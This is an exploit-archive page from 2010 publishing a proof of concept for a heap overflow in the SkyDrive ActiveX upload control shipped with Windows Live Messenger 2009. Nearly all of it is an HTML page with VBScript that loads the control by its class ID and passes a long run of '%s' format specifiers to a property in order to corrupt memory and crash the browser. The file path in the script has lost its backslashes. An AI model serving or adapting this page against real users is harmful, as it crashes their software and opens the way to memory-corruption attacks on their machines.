Windows Live Messenger 2009 ActiveX Heap Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Windows Live Messenger 2009 ActiveX Heap Overflow PoC
# Published : 2010-01-21
# Author : SarBoT511
# Previous Title : jetAudio 8.0.0.2 Basic Local Crash Exploit
# Next Title : iFTPStorage v1.2 for IphoneIpod - Remote Dos Exploit

#Aouther : [SarBoT511] (xs3@hotmail.com)
#Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC]
#tested on :[windows 7 & Vista & Xp sp3]
#Windows Live Messenger SkyDrive 2009

<html>
<object classid='clsid:C2828995-4A83-4100-A212-3024BA117356' id='target' ></object>
<script language='vbscript'>
targetFile = "C:Program FilesWindows Live SkyDriveMicrosoft.Live.Folders.RichUpload.3.dll"
prototype  = "Property Let RichUploadControlContextData As String"
memberName = "RichUploadControlContextData"
progid     = "RichUploadLib.UploadControl"
argCount   = 1
 
arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
 
target.RichUploadControlContextData = arg1
 
</script>